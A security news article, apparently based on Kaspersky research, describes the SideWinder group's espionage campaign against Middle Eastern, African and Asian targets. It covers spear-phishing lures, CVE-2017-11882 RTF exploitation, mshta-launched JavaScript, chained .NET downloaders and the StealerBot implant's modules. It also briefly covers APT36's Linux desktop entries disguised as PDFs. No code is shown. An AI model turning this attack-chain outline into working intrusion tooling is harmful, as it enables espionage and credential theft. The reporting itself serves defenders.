A sophisticated persistent threat (APT) group with alleged connections to India has initiated a series of strikes against prominent organizations and critical infrastructures in the Middle East and Africa.
The assaults have been linked to a faction known as SideWinder, also identified as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04.
Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov expressed, “The group, although appearing to have basic skills with the use of common exploits and malicious tactics, has displayed intricate operations that unveil their true capabilities.”
The targets of these attacks encompass governmental and military bodies, logistical, infrastructural, and telecommunication firms, financial establishments, universities, and oil trade companies situated in Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey, and the U.A.E.
Additionally, SideWinder has been seen focusing on diplomatic entities in Afghanistan, France, China, India, Indonesia, and Morocco.
The most notable element of the recent campaign is the deployment of a multi-phase infection technique to introduce a novel post-exploitation kit called StealerBot.
The process starts with a targeted spear-phishing email containing an attachment – either a ZIP archive carrying a Windows shortcut (LNK) file or a Microsoft Office document – which triggers a succession of intermediary JavaScript and .NET downloaders to eventually introduce the StealerBot malware.
The documents leverage the conventional method of remote template injection to fetch an RTF file hosted on a server controlled by the attacker. The RTF file, in turn, exploits CVE-2017-11882 to execute JavaScript code that executes additional JavaScript code hosted on mofa-gov-sa.direct888[.]net.
On the contrary, the LNK file uses the mshta.exe utility, a native Windows binary designated to execute Microsoft HTML Application (HTA) files, to run the JavaScript code located on a malicious website controlled by the attacker.
The JavaScript malware is designed to extract an encoded string, a .NET library dubbed “App.dll” that gathers system data and serves as a downloader for a secondary .NET payload from a server (“ModuleInstaller.dll”).
ModuleInstaller acts as a downloader as well, equipped to establish persistence on the system, execute a backdoor loader module, and retrieve subsequent components. Interestingly, the way these components are executed is contingent on the type of endpoint security solution installed on the system.
“The backdoor loader module has been under observation since 2020,” highlighted the researchers, underlining its ability to avoid detection and circumvent operation in sandboxed environments. “It has sustained relatively unaltered over the years.”
“There has been a recent update by the attacker, however the principal distinction is that earlier variants are coded to load an encrypted file using a specified filename embedded within the program, while the latest versions are crafted to enumerate files in the current directory and load those without an extension.”
The ultimate objective of these attacks is to distribute StealerBot via the Backdoor loader module. Called an “advanced modular implant” based on .NET, it is tailored to support espionage by fetching various plugins to –
- Integrate additional malware using a C++ downloader
- Capture screen images
- Record keystrokes
- Extract browser passwords
- Intercept RDP logins
- Retrieve files
- Initiate reverse shell
- Access Windows credentials through phishing, and
- Escalate privileges by bypassing User Account Control (UAC)
“The implant is composed of diverse modules managed by the main ‘Orchestrator’, responsible for liaising with the [command-and-control] and running and handling the plugins,” specified the researchers. “The Orchestrator is commonly loaded by the backdoor loader module.”
Kaspersky identified two installer components – named InstallerPayload and InstallerPayload_NET – which are not part of the attack sequence, but are used to deploy StealerBot potentially for an upgrade or to infect another user.
As SideWinder broadens its geographical scope and employs an advanced toolkit, Cyfirma disclosed new infrastructure running the Mythic post-exploitation framework and linked to Transparent Tribe (aka APT36), an adversary group believed to originate from Pakistan.
“The group is circulating malicious Linux desktop entries camouflaged as PDFs,” the announcement explained. “These entries execute scripts to download and run malign executables from remote servers, creating ongoing access and avoiding detection.”
“APT36 has begun to focus more on Linux environments due to their extensive use in Indian government institutions, particularly with the Debian-based BOSS OS and the introduction of Maya OS.”
About Author
